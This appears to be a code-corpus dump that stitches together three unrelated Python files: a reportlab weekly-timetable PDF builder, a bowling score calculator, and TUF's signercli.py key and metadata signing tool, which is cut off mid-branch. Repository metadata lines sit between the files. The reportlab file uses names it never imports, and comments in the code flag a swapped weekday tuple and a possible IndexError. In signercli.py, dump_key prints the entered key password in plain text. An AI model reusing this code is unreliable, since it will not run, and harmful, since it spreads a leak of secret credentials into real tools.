from reportlab.lib import colors
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from reportlab.platypus import PageTemplate
from reportlab.platypus import Table
from config import config
PAGE_HEIGHT = defaultPageSize[1]
PAGE_WIGTH = defaultPageSize[0]  # NOTE(review): typo for PAGE_WIDTH; unused below
styles = getSampleStyleSheet()
Title = "Hello Template"
pageinfo = "platypus example"

from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
# Register the configured TrueType font so non-ASCII (Japanese) text renders.
pdfmetrics.registerFont(
    TTFont(config['font']['name'], config['font']['path']))
styles['Normal'].fontName = config['font']['name']
# Small 8pt style used for the timetable cells.
styles.add(ParagraphStyle(name='TableCell',
                          parent=styles['Normal'],
                          fontSize=8,))

# NOTE(review): this tuple reads ('Sun','Mon','Thu','Wed','Tue','Fri','Sat')
# -- 'Thu' and 'Tue' appear swapped. It is unused below (DAYS_JP is used),
# but confirm before relying on it.
DAYS = ('Sun', 'Mon', 'Thu', 'Wed', 'Tue', 'Fri', 'Sat')
# Japanese single-character day names, Sunday first.
DAYS_JP = tuple(u'日月火水木金土')
from datetime import date
from datetime import time
from datetime import datetime
from datetime import timedelta
def srcmock(start, d, h):
    """Mock cell source: format start-of-day *start* shifted by day
    offset *d* and hour offset *h* as a timestamp string."""
    moment = datetime.combine(start, time()) + d + h
    return "%s" % (moment,)
def week(start, src):
    """Build a one-week timetable Table.

    start: date of the first column; src: callable
    (start, day_delta, hour_delta) -> cell text.  Rows are hour slots
    05:00..28:00, columns are the seven days beginning at *start*.
    """
    assert isinstance(start, date)
    cellstyle = styles['TableCell']
    # Hour slots from 05:00 through 28:00 (i.e., 04:00 next day).
    hours = [timedelta(hours=slot) for slot in range(5, 29)]
    rows_headers = ['hour/day'] + hours
    # One column per day: a date header followed by one cell per hour slot.
    day_columns = []
    for offset in range(len(DAYS_JP)):
        day = timedelta(days=offset)
        header = "%s" % (start + day,)
        cells = [Paragraph(src(start, day, h), cellstyle) for h in hours]
        day_columns.append([header] + cells)
    data = [rows_headers] + day_columns
    # Transpose so hours run down the page and days run across.
    table = Table(zip(*data), colWidths=25*mm, rowHeights=9*mm)
    table.setStyle([
        ('FONT', (0,0), (-1,-1), config['font']['name']),
        ('FONTSIZE', (0,0), (-1,-1), 8),
        ('GRID', (0,0), (-1, -1), 0.5, colors.black),
        ('TEXTCOLOR', (1,0), (1,0), colors.red),
        ('TEXTCOLOR', (7,0), (7,0), colors.blue)])
    return table
def build(fname, start, src):
    """Assemble the weekly report PDF and write it to *fname*.

    fname: output PDF path; start: date of the week's first column;
    src: callable (start, day_delta, hour_delta) -> cell text, passed
    through to week().
    """
    doc = SimpleDocTemplate(fname, pagesize=A4)
    # Timetable framed by a little vertical breathing room.
    content = [Spacer(1, 5*mm)]
    content.append(week(start, src))
    content.append(Spacer(1, 5*mm))
    doc.build(content)
if __name__ == "__main__":
    # Demo entry point: render this week's report with mock cell content
    # to the test output path from the project config.
    build(config['report']['test'],date.today(), srcmock)
UTF-8
Python
false
false
2,013
19,164,144,077,099
e168d669c56b675bf3c5d84ebeb68f117d1434d4
5985c08e7ec8f1f14d285cb2004e65625915805a
/bowling.py
dcb99643703d673ad04f57281eac21ca304842b6
[]
no_license
kebarr/bowling2
https://github.com/kebarr/bowling2
90475a12406fa72cb3143bf69aabe3be6d37a14d
148c57f67cd776c14ecadbedf5a8992e51972f42
refs/heads/master
2016-09-05T10:26:05.341412
2014-04-24T21:07:06
2014-04-24T21:07:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# use strategy james suggested: have scorecard as input then return it.
# to start with, have 1d list
# actually to pass gutter game, do bare minimum
def roll_ball(frame, pins):
    """Record one roll on the flat scorecard list *frame* (mutated in place).

    A strike (10 pins) is padded with a trailing 0 so every frame occupies
    two list entries -- except in the final frame (list already 18 or 19
    entries long), where only the 10 itself is appended.
    """
    in_final_frame = len(frame) in (18, 19)
    if pins == 10 and not in_final_frame:
        frame.extend([pins, 0])
    else:
        frame.append(pins)
# strike is next 2 pin falls, not possible rolls!
def score(frame):
    """Return the total score for the flat list of rolls in *frame*.

    Rolls are stored two per frame; a strike occupies a (10, 0) pair
    (see roll_ball).  For each frame-opening roll (even index) with
    enough look-ahead, a spare adds the next roll as bonus and a strike
    adds the next two actual pin falls.
    """
    # Fixed: removed a leftover debug print of the frame to stdout.
    total = 0
    for i in range(len(frame)):
        total += frame[i]
        # Only frame-opening rolls start a bonus; the look-ahead below
        # requires frame[i + 3] to exist.
        if i % 2 == 0 and i + 3 < len(frame):
            if frame[i] + frame[i + 1] == 10:
                if frame[i + 1] != 0:
                    # Spare: bonus is the next single roll.
                    total += frame[i + 2]
                elif frame[i + 2] != 10:
                    # Strike followed by an open frame: next two rolls.
                    total += frame[i + 2]
                    total += frame[i + 3]
                else:
                    # Strike followed by another strike: the 10 plus the
                    # roll after its padding 0.
                    # NOTE(review): frame[i + 4] is only guarded by
                    # i + 3 < len(frame); a trailing double strike can
                    # raise IndexError -- TODO confirm intended input.
                    total += frame[i + 2]
                    total += frame[i + 4]
    return total
"""
<Program Name>
signercli.py
<Author>
Vladimir Diaz <[email protected]>
<Started>
April 5, 2012. Based on a previous version of this module by Geremy Condra.
<Copyright>
See LICENSE for licensing information.
<Purpose>
Provide an interactive command-line interface to create and sign metadata.
This script can be used to create all of the top-level role files required
by TUF, which include 'root.txt', 'targets.txt', 'release.txt', and
'timestamp.txt'. It also provides options to generate RSA keys, change the
encryption/decryption keys of encrypted key files, list the keyids of
the signing keys stored in a keystore directory, create delegated roles,
and dump the contents of signing keys (i.e., public and private keys, key
type, etc.)
This module can be best understood if read starting with the parse_option()
call in __main__. All of the options accept a single keystore
directory argument. Beyond this point, the script is interactive.
If any additional arguments is required, the user will be asked to input
these values. The script will process one command-line option and
  raise an error for any other options that might be supplied.
Initially, the 'quickstart.py' script is utilized when the repository is
first created. 'signercli.py' would then be executed to update the state
of the repository. For example, the repository owner wants to change the
'targets.txt' signing key. The owner would run 'signercli.py' to
generate a new RSA key, add the new key to the configuration file created
by 'quickstart.py', and then run 'signercli' to update the metadata files.
<Usage>
$ python signercli.py --<option> <keystore_directory>
Examples:
    $ python signercli.py --genrsakey ./keystore
$ python signercli.py --changepass ./keystore
<Options>
See the parse_options() function for the full list of supported options.
"""
import os
import optparse
import getpass
import sys
import logging
import tuf
import tuf.repo.signerlib
import tuf.repo.keystore
import tuf.util
import tuf.log
# JSON module obtained through TUF's utility wrapper.
json = tuf.util.import_json()

# See 'log.py' to learn how logging is handled in TUF.
logger = logging.getLogger('tuf.signercli')

# The maximum number of attempts the user has to enter
# valid input.
MAX_INPUT_ATTEMPTS = 3
def _check_directory(directory):
  """
    Validate 'directory' and return its normalized form.

    Any 'tuf.FormatError' or 'tuf.Error' raised by the underlying
    signerlib check is re-raised as 'tuf.RepositoryError' so callers
    only need to handle one exception type.
  """
  try:
    # Raises 'tuf.FormatError' or 'tuf.Error'.
    directory = tuf.repo.signerlib.check_directory(directory)
  except (tuf.FormatError, tuf.Error), e:
    message = str(e)+'\n'
    raise tuf.RepositoryError(message)

  return directory
def _get_password(prompt='Password: ', confirm=False):
  """
    Return the password entered by the user.  If 'confirm'
    is True, the user is asked to enter the previously
    entered password once again.  If they match, the
    password is returned to the caller.  Loops until the
    two entries match.
  """
  while True:
    # Echo-free prompt; the prompt text is written to stderr so stdout
    # stays clean for program output.
    password = getpass.getpass(prompt, sys.stderr)
    if not confirm:
      return password
    password2 = getpass.getpass('Confirm: ', sys.stderr)
    if password == password2:
      return password
    else:
      print 'Mismatch; try again.'
def _prompt(message, result_type=str):
  """
    Prompt the user for input by printing 'message', converting
    the input to 'result_type', and returning the value to the
    caller.  May raise whatever 'result_type' raises on bad input
    (e.g. ValueError for int).
  """
  # NOTE: raw_input() is Python 2-only; this module targets Python 2.
  return result_type(raw_input(message))
def _get_metadata_directory():
  """
    Prompt the user for the metadata directory and return its
    validated, normalized form.

    Note: validation is delegated to _check_directory(), which
    re-raises any 'tuf.FormatError' or 'tuf.Error' as
    'tuf.RepositoryError'.
  """
  metadata_directory = _prompt('\nEnter the metadata directory: ', str)

  # Raises 'tuf.FormatError' or 'tuf.Error' (converted to
  # 'tuf.RepositoryError' by _check_directory).
  metadata_directory = _check_directory(metadata_directory)

  return metadata_directory
def _list_keyids(keystore_directory):
"""
List the key files found in 'keystore_directory'.
It is assumed the directory exists and has been validated by
the caller. The keyids are listed without the '.key' extension.
"""
# Extract the key files ending in a '.key' extension.
key_paths = []
for filename in os.listdir(keystore_directory):
full_path = os.path.join(keystore_directory, filename)
if filename.endswith('.key') and not os.path.isdir(full_path):
key_paths.append(filename)
# Print the keys without the '.key' extension.
print '\nListing the keyids in '+repr(keystore_directory)
for keyid in key_paths:
print keyid[0:keyid.rfind('.key')]
def _get_keyids(keystore_directory):
  """
    Load the keyids in 'keystore_directory'.  The keystore
    database is populated with the keyids that are found
    and successfully loaded.  A list containing the keyids
    of the loaded keys is returned to the caller.  Since the
    key files are stored in encrypted form, the user is asked
    to enter the password that was used to encrypt the key
    file.
  """
  # The keyids list containing the keys loaded.
  loaded_keyids = []

  # Save the 'load_keystore_from_keyfiles' function call.
  load_key = tuf.repo.keystore.load_keystore_from_keyfiles

  # Ask the user for the keyid and password.  Next, try to load specified
  # keyid/password combination.  If loaded, append the loaded key's keyid
  # to 'loaded_keyids'.  Loop the steps above or exit when the user enters
  # 'quit'.
  while True:
    keyid_prompt = '\nEnter the keyid or "quit" when done: '
    keyid = _prompt(keyid_prompt, str)
    if keyid.lower() == 'quit':
      break

    # Get the password from the user so we can decrypt the key file.
    password = _get_password('\nEnter the keyid\'s password: ')

    # Try to load the keyfile with the keyid and password credentials.
    loaded_keyid = load_key(keystore_directory, [keyid], [password])

    # Was 'keyid' loaded?
    if keyid not in loaded_keyid:
      logger.error('Could not load keyid: '+keyid)
      continue

    # Append 'keyid' to the loaded list of keyids.  Since only one keyid
    # was requested, element 0 is presumably that keyid -- verify against
    # load_keystore_from_keyfiles' contract.
    loaded_keyids.append(loaded_keyid[0])

  return loaded_keyids
def _get_all_config_keyids(config_filepath, keystore_directory):
  """
    Retrieve the contents of the config file and load
    the keys for the top-level roles.  After this function
    returns successfully, all the required roles are loaded
    in the keystore.  The arguments should be absolute paths.

  <Exceptions>
    tuf.Error, if the required top-level keys could
    not be loaded.

  <Returns>
    A dictionary containing the keyids for the top-level roles.
    loaded_keyids = {'root': [1233d3d, 598djdks, ..],
                     'release': [sdfsd323, sdsd9090s, ..]
                     ...}
  """
  # Save the 'load_keystore_from_keyfiles' function call.
  load_key = tuf.repo.keystore.load_keystore_from_keyfiles

  # 'tuf.Error' raised if the configuration file cannot be read.
  config_dict = tuf.repo.signerlib.read_config_file(config_filepath)

  loaded_keyids = {}
  # Extract the sections from the config file.  We are only
  # interested in role sections.
  for key, value in config_dict.items():
    if key in ['root', 'targets', 'release', 'timestamp']:
      # Try to load the keyids for each role.  The user is given
      # MAX_INPUT_ATTEMPTS password attempts per keyid.
      loaded_keyids[key] = []
      for keyid in value['keyids']:
        for attempt in range(MAX_INPUT_ATTEMPTS):
          message = '\nEnter the password for the '+key+' role ('+keyid+'): '
          password = _get_password(message)
          loaded_key = load_key(keystore_directory, [keyid], [password])
          if not loaded_key or keyid not in loaded_key:
            logger.error('Could not load keyid: '+keyid)
            continue
          loaded_keyids[key].append(keyid)
          break
        # All attempts exhausted without a successful load: give up.
        if keyid not in loaded_keyids[key]:
          raise tuf.Error('Could not load a required top-level role key')

  # Ensure we loaded keys for the required top-level roles.
  for key in ['root', 'targets', 'release', 'timestamp']:
    if key not in loaded_keyids:
      message = 'The configuration file did not contain the required roles'
      raise tuf.Error(message)

  return loaded_keyids
def _get_role_config_keyids(config_filepath, keystore_directory, role):
  """
    Retrieve and load the key(s) for 'role', as listed in the keyids
    found in 'config_filepath'.  'config_filepath' and 'keystore_directory'
    should be absolute paths.

  <Exceptions>
    tuf.Error, if the required keys could not be loaded.
  """
  # Save the 'load_keystore_from_keyfiles' function call.
  load_key = tuf.repo.keystore.load_keystore_from_keyfiles

  # 'tuf.Error' raised if the configuration file cannot be read.
  config_dict = tuf.repo.signerlib.read_config_file(config_filepath)

  role_keyids = []
  # Extract the sections from the config file.  We are only interested
  # in the 'role' section.
  for key, value in config_dict.items():
    if key == role:
      for keyid in value['keyids']:
        for attempt in range(MAX_INPUT_ATTEMPTS):
          message = '\nEnter the password for the '+key+' role ('+keyid+'): '
          password = _get_password(message)
          loaded_key = load_key(keystore_directory, [keyid], [password])
          if not loaded_key or keyid not in loaded_key:
            # Fixed: log-only on failure, consistent with
            # _get_all_config_keyids(); the duplicate print to stdout
            # was removed.
            logger.error('Could not load keyid: '+keyid)
            continue
          role_keyids.append(keyid)
          break
      # Ensure we loaded all the keyids.
      for keyid in value['keyids']:
        if keyid not in role_keyids:
          raise tuf.Error('Could not load a required role key')

  if not role_keyids:
    raise tuf.Error('Could not load the required keys for '+role)

  return role_keyids
def _sign_and_write_metadata(metadata, keyids, filename):
  """
    Sign 'metadata' and write it to 'filename' (an absolute path),
    overwriting the original file if it exists.  If any of the
    keyids have already signed the file, the old signatures of
    those keyids will be replaced.

  <Exceptions>
    tuf.FormatError, if any of the arguments are incorrectly formatted.

    tuf.Error, if an error is encountered.
  """
  # Sign the metadata object.  The 'signable' object contains the keyids
  # used in the signing process, including the signatures generated.
  signable = tuf.repo.signerlib.sign_metadata(metadata, keyids, filename)

  # Write the 'signable' object to 'filename'.  The 'filename' file is
  # the final metadata file, such as 'root.txt' and 'targets.txt'.
  tuf.repo.signerlib.write_metadata_file(signable, filename)
def change_password(keystore_directory):
  """
  <Purpose>
    Change the password for the signing key specified by the user.
    All the values required by the user will be interactively
    retrieved by this function.

  <Arguments>
    keystore_directory:
      The directory containing the signing keys (i.e., key files ending
      in '.key').

  <Exceptions>
    tuf.RepositoryError, if an error occurred while updating the repository.

  <Side Effects>
    The key file specified by the user is modified, including the encryption
    key.

  <Returns>
    None.
  """
  # Save the 'load_keystore_from_keyfiles' function call.
  load_key = tuf.repo.keystore.load_keystore_from_keyfiles

  # Verify the 'keystore_directory' argument.
  keystore_directory = _check_directory(keystore_directory)

  # List the keyids in the keystore and prompt the user for the keyid they
  # wish to modify.
  _list_keyids(keystore_directory)

  # Retrieve the keyid from the user.
  message = '\nEnter the keyid for the password you wish to change: '
  keyid = _prompt(message, str)

  # Get the old password from the user.
  old_password_prompt = '\nEnter the old password for the keyid: '
  old_password = _get_password(old_password_prompt)

  # Try to load the keyfile; loading proves the old password is correct.
  loaded_keys = load_key(keystore_directory, [keyid], [old_password])

  # Was 'keyid' loaded?
  if keyid not in loaded_keys:
    message = 'Could not load keyid: '+keyid+'\n'
    raise tuf.RepositoryError(message)

  # Retrieve the new password.
  new_password = _get_password('\nNew password: ', confirm=True)

  # Now that we have all the required information, try to change the password.
  try:
    tuf.repo.keystore.change_password(keyid, old_password, new_password)
  except (tuf.BadPasswordError, tuf.UnknownKeyError), e:
    message = str(e)+'\n'
    raise tuf.RepositoryError(message)

  # Save the changes.
  tuf.repo.keystore.save_keystore_to_keyfiles(keystore_directory)
def generate_rsa_key(keystore_directory):
  """
  <Purpose>
    Generate an RSA key and save it to the keystore directory.

  <Arguments>
    keystore_directory:
      The directory containing the signing keys (i.e., key files ending
      in '.key').

  <Exceptions>
    tuf.RepositoryError, if an error occurred while updating the repository.

  <Side Effects>
    An RSA key will be generated and added to tuf.repo.keystore.
    The RSA key will be saved to the keystore directory specified
    on the command-line.

  <Returns>
    None.
  """
  # Save a reference to the generate_and_save_rsa_key() function.
  save_rsa_key = tuf.repo.signerlib.generate_and_save_rsa_key

  # Verify the 'keystore_directory' argument.
  keystore_directory = _check_directory(keystore_directory)

  # Retrieve the number of bits for the RSA key from the user.
  rsa_key_bits = _prompt('\nEnter the number of bits for the RSA key: ', int)

  # Retrieve the password used to encrypt/decrypt the key file from the user.
  message = '\nEnter a password to encrypt the generated RSA key: '
  password = _get_password(message, confirm=True)

  # Generate the RSA key and save it to 'keystore_directory'.
  try:
    save_rsa_key(keystore_directory=keystore_directory,
                 password=password, bits=rsa_key_bits)
  except (tuf.FormatError, tuf.CryptoError), e:
    message = 'The RSA key could not be generated. '+str(e)+'\n'
    raise tuf.RepositoryError(message)
def list_signing_keys(keystore_directory):
  """
  <Purpose>
    Print the key IDs of the signing keys listed in the keystore
    directory.

  <Arguments>
    keystore_directory:
      The directory containing the signing keys (i.e., key files ending
      in '.key').

  <Exceptions>
    tuf.RepositoryError, if an error occurred while updating the repository.

  <Side Effects>
    The keyids found in the keystore directory are printed to stdout.

  <Returns>
    None.
  """
  # Verify the 'keystore_directory' argument.
  keystore_directory = _check_directory(keystore_directory)

  _list_keyids(keystore_directory)
def dump_key(keystore_directory):
"""
<Purpose>
Dump the contents of the signing key specified by the user.
This dumped information includes the keytype, signing method,
the public key, and the private key (if requested by the user).
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of encrypted key files are extracted and printed.
<Returns>
None.
"""
# Save the 'load_keystore_from_keyfiles' function call.
load_key = tuf.repo.keystore.load_keystore_from_keyfiles
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# List the keyids found in 'keystore_directory', minus the '.key' extension.
_list_keyids(keystore_directory)
# Retrieve the keyid and password from the user.
message = '\nEnter the keyid for the signing key you wish to dump: '
keyid = _prompt(message, str)
password = _get_password('\nEnter the password for the keyid: ')
print
print keyid
print password
# Try to load the keyfile
loaded_keys = load_key(keystore_directory, [keyid], [password])
# Was 'keyid' loaded?
if keyid not in loaded_keys:
message = 'Could not load keyid: '+keyid+'\n'
raise tuf.RepositoryError(message)
# Get the key object.
key = tuf.repo.keystore.get_key(keyid)
# Ask the user if they would like to print the private key as well.
show_private = False
prompt = 'Should the private key be printed as well?' \
' (if yes, enter \'private\'): '
print '\n*WARNING* Printing the private key reveals' \
' sensitive information *WARNING*'
input = _prompt(prompt, str)
if input.lower() == 'private':
show_private = True
# Retrieve the key metadata according to the keytype.
if key['keytype'] == 'rsa':
key_metadata = tuf.rsa_key.create_in_metadata_format(key['keyval'],
private=show_private)
else:
message = 'The keystore contains an invalid key type.'
raise tuf.RepositoryError(message)
# Print the contents of the key metadata.
print json.dumps(key_metadata, indent=2, sort_keys=True)
def make_root_metadata(keystore_directory):
"""
<Purpose>
Create the 'root.txt' file.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing root metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Get the metadata directory and the metadata filenames.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
filenames = tuf.repo.signerlib.get_metadata_filenames(metadata_directory)
# Get the configuration file.
config_filepath = _prompt('\nEnter the configuration file path: ', str)
config_filepath = os.path.abspath(config_filepath)
# Load the keys for the top-level roles.
try:
loaded_keyids = _get_all_config_keyids(config_filepath, keystore_directory)
except (tuf.Error, tuf.FormatError), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
root_keyids = loaded_keyids['root']
# Generate the root metadata and write it to 'root.txt'.
try:
tuf.repo.signerlib.build_root_file(config_filepath, root_keyids,
metadata_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
def make_targets_metadata(keystore_directory):
  """
  <Purpose>
    Create the 'targets.txt' metadata file.  The targets must exist at the
    same path they should on the repository.  This takes a list of targets.
    We're not worrying about custom metadata at the moment.  It's allowed to
    not provide keys.

  <Arguments>
    keystore_directory:
      The directory containing the signing keys (i.e., key files ending
      in '.key').

  <Exceptions>
    tuf.RepositoryError, if an error occurred while updating the repository.

  <Side Effects>
    The contents of an existing targets metadata file is overwritten.

  <Returns>
    None.
  """
  # Verify the 'keystore_directory' argument.
  keystore_directory = _check_directory(keystore_directory)

  # Retrieve the target files.
  prompt_targets = '\nEnter the directory containing the target files: '
  target_directory = _prompt(prompt_targets, str)

  # Verify 'target_directory'.
  target_directory = _check_directory(target_directory)

  # Retrieve the metadata directory and the 'targets' filename.
  try:
    metadata_directory = _get_metadata_directory()
  except (tuf.FormatError, tuf.Error), e:
    message = str(e)+'\n'
    raise tuf.RepositoryError(message)

  # Get the configuration file.
  config_filepath = _prompt('\nEnter the configuration file path: ', str)
  config_filepath = os.path.abspath(config_filepath)

  try:
    # Retrieve and load the 'targets' signing keys.
    targets_keyids = _get_role_config_keyids(config_filepath,
                                             keystore_directory, 'targets')
  except (tuf.FormatError, tuf.Error), e:
    message = str(e)+'\n'
    raise tuf.RepositoryError(message)

  try:
    # Create, sign, and write the "targets.txt" file.
    tuf.repo.signerlib.build_targets_file(target_directory, targets_keyids,
                                          metadata_directory)
  except (tuf.FormatError, tuf.Error), e:
    message = str(e)+'\n'
    raise tuf.RepositoryError(message)
def make_release_metadata(keystore_directory):
"""
<Purpose>
Create the release metadata file.
The minimum metadata must exist. This is root.txt and targets.txt.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing release metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Retrieve the metadata directory and the release filename.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
filenames = tuf.repo.signerlib.get_metadata_filenames(metadata_directory)
release_filename = filenames['release']
# Get the configuration file.
config_filepath = _prompt('\nEnter the configuration file path: ', str)
config_filepath = os.path.abspath(config_filepath)
# Retrieve and load the 'release' signing keys.
try:
release_keyids = _get_role_config_keyids(config_filepath,
keystore_directory, 'release')
# Generate the root metadata and write it to 'release.txt'
tuf.repo.signerlib.build_release_file(release_keyids, metadata_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
def make_timestamp_metadata(keystore_directory):
"""
<Purpose>
Create the timestamp metadata file. The 'release.txt' file must exist.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing timestamp metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Retrieve the metadata directory and the timestamp filename.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
filenames = tuf.repo.signerlib.get_metadata_filenames(metadata_directory)
timestamp_filename = filenames['timestamp']
# Get the configuration file.
config_filepath = _prompt('\nEnter the configuration file path: ', str)
config_filepath = os.path.abspath(config_filepath)
# Retrieve and load the 'timestamp' signing keys.
try:
timestamp_keyids = _get_role_config_keyids(config_filepath,
keystore_directory, 'timestamp')
# Generate the root metadata and write it to 'timestamp.txt'
tuf.repo.signerlib.build_timestamp_file(timestamp_keyids,
metadata_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
def sign_metadata_file(keystore_directory):
  """
  <Purpose>
    Sign the metadata file specified by the user.

  <Arguments>
    keystore_directory:
      The directory containing the signing keys (i.e., key files ending
      in '.key').

  <Exceptions>
    tuf.RepositoryError, if an error occurred while updating the repository.

  <Side Effects>
    The contents of an existing metadata file is overwritten.

  <Returns>
    None.
  """
  # Verify the 'keystore_directory' argument.
  keystore_directory = _check_directory(keystore_directory)

  # List the keyids available in the keystore.
  _list_keyids(keystore_directory)

  # Retrieve the keyids of the signing keys from the user.
  print '\nThe keyids that will sign the metadata file must be loaded.'
  loaded_keyids = _get_keyids(keystore_directory)

  if len(loaded_keyids) == 0:
    message = 'No keyids were loaded\n'
    raise tuf.RepositoryError(message)

  # Retrieve the metadata file the user intends to sign.
  metadata_filename = _prompt('\nEnter the metadata filename: ', str)

  metadata_filename = os.path.abspath(metadata_filename)
  if not os.path.isfile(metadata_filename):
    message = repr(metadata_filename)+' is an invalid file.\n'
    raise tuf.RepositoryError(message)

  # Create, sign, and write the metadata file.
  metadata = tuf.repo.signerlib.read_metadata_file(metadata_filename)
  _sign_and_write_metadata(metadata, loaded_keyids, metadata_filename)
def make_delegation(keystore_directory):
  """
  <Purpose>
    Create a delegation by updating the 'delegations' field of 'targets.txt'
    and creating the delegated role's metadata file.  The user specifies the
    delegated role's name and target files.  The 'targets.txt' file must exist.

  <Arguments>
    keystore_directory:
      The directory containing the signing keys (i.e., key files ending
      in '.key').

  <Exceptions>
    tuf.RepositoryError, if an error occurred while updating the repository.

  <Side Effects>
    The targets metadata file is modified.  The 'delegations' field of
    'targets.txt' is added.

  <Returns>
    None.
  """
  # Verify the 'keystore_directory' argument.
  keystore_directory = _check_directory(keystore_directory)

  # Get the metadata directory.
  try:
    metadata_directory = _get_metadata_directory()
  except (tuf.FormatError, tuf.Error), e:
    message = str(e)+'\n'
    raise tuf.RepositoryError(message)

  # Get the delegated role's target directory, which should be located within
  # the repository's targets directory.  We need this directory to generate the
  # delegated role's target paths.
  prompt = '\nNOTE: The directory entered below should be located within the '+\
    'repository\'s targets directory.\nEnter the directory containing the '+\
    'delegated role\'s target files: '
  delegated_targets_directory = _prompt(prompt, str)

  # Verify 'delegated_targets_directory'.
  try:
    tuf.repo.signerlib.check_directory(delegated_targets_directory)
  except (tuf.FormatError, tuf.Error), e:
    message = str(e)+'\n'
    raise tuf.RepositoryError(message)

  # Get all the target roles and their respective keyids.
  # These keyids will let the user know which roles are currently known.
  # signerlib.get_target_keyids() returns a dictionary that looks something
  # like this: {'targets':[keyid1, ...], 'targets/role1':[keyid], ...}
  targets_roles = tuf.repo.signerlib.get_target_keyids(metadata_directory)

  # Get the parent role.  We need to modify the parent role's metadata file.
  print '\nListing "targets" and all available delegated roles.'
  for section in targets_roles.keys():
    print section
  parent_role = None
  # Retrieve the parent role from the user, with a bounded number of tries.
  for attempt in range(MAX_INPUT_ATTEMPTS):
    prompt = '\nChoose and enter the parent role\'s full name: '
    parent_role = _prompt(prompt, str)
    if parent_role not in targets_roles:
      print '\nInvalid role name entered'
      parent_role = None
      continue
    else:
      break

  # Ensure we loaded a valid parent role.
  if parent_role is None:
    message = 'Could not get a valid parent role.\n'
    raise tuf.RepositoryError(message)

  # 'load_key' is a reference to the 'load_keystore_from_keyfiles function'.
  load_key = tuf.repo.keystore.load_keystore_from_keyfiles

  # Load the parent's key(s).  The key needs to be loaded because
  # its metadata file will be modified.
  parent_keyids = []
  for keyid in targets_roles[parent_role]:
    for attempt in range(MAX_INPUT_ATTEMPTS):
      prompt = 'Enter the password for '+parent_role+' ('+keyid+'): '
      password = _get_password(prompt)
      loaded_keyid = load_key(keystore_directory, [keyid], [password])
      if keyid not in loaded_keyid:
        print '\nThe keyid could not be loaded.'
        continue
      parent_keyids.append(loaded_keyid[0])
      break
    if keyid not in parent_keyids:
      message = 'Could not load the keys for the parent role.\n'
      raise tuf.RepositoryError(message)

  # Retrieve the delegated rolename from the user (e.g., 'role1').
  delegated_role = _prompt('\nEnter the delegated role\'s name: ', str)

  # List the keyids available in the keystore.  The user will next
  # identify the keyid for the new delegated role.
  _list_keyids(keystore_directory)

  # Retrieve the delegated role's keyid from the user.
  print '\nThe keyid of the delegated role must be loaded.'
  delegated_keyid = _get_keyids(keystore_directory)

  # Ensure we actually loaded one delegated key.  Delegated roles
  # should have only one signing key.
  if len(delegated_keyid) != 1:
    message = 'Only one key must be loaded for the delegated role\n'
    raise tuf.RepositoryError(message)
  delegated_keyid = delegated_keyid[0]

  # Retrieve the file paths for the delegated targets.
  delegated_paths = []
  for filename in os.listdir(delegated_targets_directory):
    full_path = os.path.join(delegated_targets_directory, filename)
    if os.path.isfile(full_path):
      # The target paths need to be relative to the repository's targets
      # directory (e.g., 'targets/role1/target_file.txt').
      # [len(repository_directory)+1:] strips the repository path, including
      # its trailing path separator.
      repository_directory, junk = os.path.split(metadata_directory)
      delegated_path = delegated_targets_directory[len(repository_directory)+1:]
      target_path = os.path.join(delegated_path, filename)
      delegated_paths.append(target_path)
  message = 'The target paths for '+repr(delegated_role)+': '+repr(delegated_paths)
  logger.info(message)

  # Create, sign, and write the delegated role's metadata file.
  parent_directory = os.path.join(metadata_directory, parent_role)
  try:
    os.mkdir(parent_directory)
  except OSError, e:
    # Presumably the directory already exists from a previous delegation;
    # other OSError causes are silently ignored too -- TODO confirm.
    pass
  delegated_role_filename = delegated_role+'.txt'
  metadata_filename = os.path.join(parent_directory, delegated_role_filename)
  repository_directory, junk = os.path.split(metadata_directory)
  delegated_metadata = tuf.repo.signerlib.generate_targets_metadata(repository_directory,
                                                                    delegated_paths)
  _sign_and_write_metadata(delegated_metadata, [delegated_keyid], metadata_filename)

  # Retrieve the key from the keystore.
  role_key = tuf.repo.keystore.get_key(delegated_keyid)

  # Extract the metadata from the parent role's file.
  parent_filename = os.path.join(metadata_directory, parent_role)
  parent_filename = parent_filename+'.txt'
  parent_signable = tuf.repo.signerlib.read_metadata_file(parent_filename)
  parent_metadata = parent_signable['signed']

  # Extract the delegations structure if it exists.
  delegations = parent_metadata.get('delegations', {})

  # Update the keys field.
  keys = delegations.get('keys', {})
  if role_key['keytype'] == 'rsa':
    keys[delegated_keyid] = tuf.rsa_key.create_in_metadata_format(role_key['keyval'])
  else:
